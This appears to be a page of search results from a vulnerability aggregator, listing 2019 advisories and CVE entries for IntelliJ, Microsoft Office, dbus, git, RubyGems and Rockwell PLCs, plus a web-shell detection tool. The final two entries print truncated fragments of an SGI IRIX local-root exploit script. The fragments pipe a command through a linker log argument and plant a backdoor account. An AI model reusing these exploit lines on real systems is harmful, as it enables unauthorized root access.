3764 matches found

Kitploit
added 2019/07/17 9:42 p.m., 231 views

Shellsum - A Defense Tool - Detect Web Shells In Local Directories Via Md5Sum

A defense tool - detect web shells in local directories via md5sum Features Fast speed Lightweight Big database Tabled output Usages Install git clone https://github.com/ManhNho/shellsum.git chmod 755 -R shellsum/ cd shellsum/ pip install -r requirements.txt Run python shellsum.py ToDo Smooth...

7.2 AI score
Exploits 0, References 2
Tenable Nessus
added 2019/07/15 12:0 a.m., 28 views

OracleVM 3.3 / 3.4 : dbus (OVMSA-2019-0034)

The remote OracleVM system is missing necessary patches to address critical security updates : - fix netlink poll: error 4 Zhenzhong Duan - Apply patch for CVE-2019-12749 1725574 - Fix CVE-2019-12749 1725574 - Add dbus-run-session 1268972 C Tenable Network Security, Inc. The package checks in thi...

7.1 CVSS, 7.2 AI score, 0.00046 EPSS
Exploits 0, References 3
OpenVAS
added 2019/07/11 12:0 a.m., 356 views

Microsoft Office 365 (2016 Click-to-Run) Multiple Vulnerabilities (Jul 2019)

This host is missing an important security update according to Microsoft Office Click-to-Run updates. SPDX-FileCopyrightText: 2019 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier:...

9.3 CVSS, 7 AI score, 0.24741 EPSS
Exploits 0, References 6
NVD
added 2019/07/03 7:15 p.m., 14 views

CVE-2019-9823

In several JetBrains IntelliJ IDEA versions, creating remote run configurations of JavaEE application servers leads to saving a cleartext record of the server credentials in the IDE configuration files. The issue has been fixed in the following versions: 2018.3.5, 2018.2.8, 2018.1.8...

9.8 CVSS, 9 AI score, 0.00002 EPSS
Exploits 0, References 1
UbuntuCve
added 2019/07/03 7:15 p.m., 28 views

CVE-2019-10104

In several JetBrains IntelliJ IDEA Ultimate versions, an Application Server run configuration for Tomcat, Jetty, Resin, or CloudBees with the default setting allowed a remote attacker to execute code when the configuration is running, because a JMX server listened on all interfaces instead of...

9.8 CVSS, 7.3 AI score, 0.00021 EPSS
Exploits 0, References 1
UbuntuCve
added 2019/07/03 7:15 p.m., 24 views

CVE-2019-9823

In several JetBrains IntelliJ IDEA versions, creating remote run configurations of JavaEE application servers leads to saving a cleartext record of the server credentials in the IDE configuration files. The issue has been fixed in the following versions: 2018.3.5, 2018.2.8, 2018.1.8...

9.8 CVSS, 7.2 AI score, 0.00002 EPSS
Exploits 0, References 1
Prion
added 2019/07/03 7:15 p.m., 16 views

Design/Logic Flaw

In several JetBrains IntelliJ IDEA versions, creating remote run configurations of JavaEE application servers leads to saving a cleartext record of the server credentials in the IDE configuration files. The issue has been fixed in the following versions: 2018.3.5, 2018.2.8, 2018.1.8...

5 CVSS, 9.4 AI score, 0.00002 EPSS
Exploits 0, References 1, Affected Software 1
OSV
added 2019/07/03 7:15 p.m., 2 views

UBUNTU-CVE-2019-9823

In several JetBrains IntelliJ IDEA versions, creating remote run configurations of JavaEE application servers leads to saving a cleartext record of the server credentials in the IDE configuration files. The issue has been fixed in the following versions: 2018.3.5, 2018.2.8, 2018.1.8...

9.8 CVSS, 7.2 AI score, 0.00002 EPSS
Exploits 0, References 2
Cvelist
added 2019/07/03 6:40 p.m., 16 views

CVE-2019-9872

In several versions of JetBrains IntelliJ IDEA Ultimate, creating run configurations for cloud application servers leads to saving a cleartext unencrypted record of the server credentials in the IDE configuration files. If the Settings Repository plugin was then used and configured to synchronize...

8.1 AI score, 0.00002 EPSS
Exploits 0, References 1
Cvelist
added 2019/07/03 6:11 p.m., 13 views

CVE-2019-9823

In several JetBrains IntelliJ IDEA versions, creating remote run configurations of JavaEE application servers leads to saving a cleartext record of the server credentials in the IDE configuration files. The issue has been fixed in the following versions: 2018.3.5, 2018.2.8, 2018.1.8...

8.5 AI score, 0.00002 EPSS
Exploits 0, References 1
BDU FSTEC
added 2019/06/27 12:0 a.m., 2 views

The vulnerability of the wfst_run application, which is part of the speech-tools speech recognition system, allows a violator to cause a service failure.

The vulnerability of the wfst_run application, which is part of the speech-tools speech recognition system, is related to overflow errors in the command line processing. Exploiting this vulnerability can allow an attacker to cause a service failure by submitting commands with specially crafted...

5.1 CVSS, 5.6 AI score
Exploits 0
Mageia
added 2019/06/21 1:7 a.m., 31 views

Updated git packages fix security vulnerability

Git before 2.19.2 on Linux and UNIX executes commands from the current working directory (as if '.' were at the end of $PATH) in certain cases involving the run_command() API and run-command.c, because there was a dangerous change from execvp to execv during 2017 (CVE-2018-19486)...

9.8 CVSS, 2.1 AI score, 0.00528 EPSS
Exploits 0, References 1
OpenVAS
added 2019/06/12 12:0 a.m., 170 views

Microsoft Office 365 (2016 Click-to-Run) Multiple RCE Vulnerabilities (Jun 2019)

This host is missing an important security update according to Microsoft Office Click-to-Run updates. SPDX-FileCopyrightText: 2019 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier:...

9.3 CVSS, 7.5 AI score, 0.13212 EPSS
Exploits 0, References 3
Symantec
added 2019/05/14 12:0 a.m., 102 views

Microsoft SQL Server CVE-2019-0819 Information Disclosure Vulnerability

Description Microsoft SQL Server is prone to an information-disclosure vulnerability. An attacker can leverage this issue to obtain sensitive information that may aid in further attacks. Technologies Affected Microsoft SQL Server 2017 for x64-based Systems Recommendations Block external access at...

6.4 AI score, 0.03214 EPSS
Exploits 0, Affected Software 1
RedHat Linux
added 2019/05/13 9:20 a.m., 2 views

rubygems: Escape sequence injection vulnerability in errors

An issue was discovered in RubyGems 2.6 and later through 3.0.2. Since Gem::CommandManager#run calls alert_error without escaping, escape sequence injection is possible. There are many ways to cause an error...

7.5 CVSS, 6.7 AI score, 0.00321 EPSS
Exploits 0, References 4
Tenable Nessus
added 2019/05/08 12:0 a.m., 16 views

Rockwell Automation Micrologix 1400 <= 21.2 Exploitable Access Control

Binary data 720215.prm...

10 CVSS, 7.3 AI score, 0.36951 EPSS
Exploits 1, References 2
Tenable Nessus
added 2019/05/08 12:0 a.m., 17 views

Rockwell Automation/Allen-Bradley Multiple Devices Authentication Bypass (ICSA-18-310-02)

Binary data 720141.prm...

8.6 CVSS, 7.3 AI score, 0.00087 EPSS
Exploits 0, References 2
Tenable Nessus
added 2019/05/08 12:0 a.m., 9 views

Rockwell Automation Micrologix 1400 <= 21.2 Fault Bits Exploit

Binary data 720224.prm...

10 CVSS, 7 AI score, 0.42565 EPSS
Exploits 1, References 2
0day.today
added 2019/04/29 12:0 a.m., 28 views

SGI IRIX <= 6.4.x Run-Time Linker Arbitrary File Creation Exploit

SGI IRIX versions 6.4.x and below run-time linker rld arbitrary file creation exploit. !/bin/sh SGI IRIX /etc/passwd" /tmp/.x.sh chmod 755 /tmp/.x.sh RLDARGS="-log /.cshrc |/tmp/.x.sh" /sbin/su last -3 root echo " waiting 5mins for root to login..." sleep 300 su - w00t 0day.today 2019-04-30...

0.3 AI score
Exploits 0
Packet Storm
added 2019/04/28 12:0 a.m., 51 views

SGI IRIX 6.4.x Run-Time Linker Arbitrary File Creation

!/bin/sh SGI IRIX /etc/passwd" /tmp/.x.sh chmod 755 /tmp/.x.sh RLDARGS="-log /.cshrc |/tmp/.x.sh" /sbin/su last -3 root echo " waiting 5mins for root to login..." sleep 300 su - w00t...

0.9 AI score
Exploits 0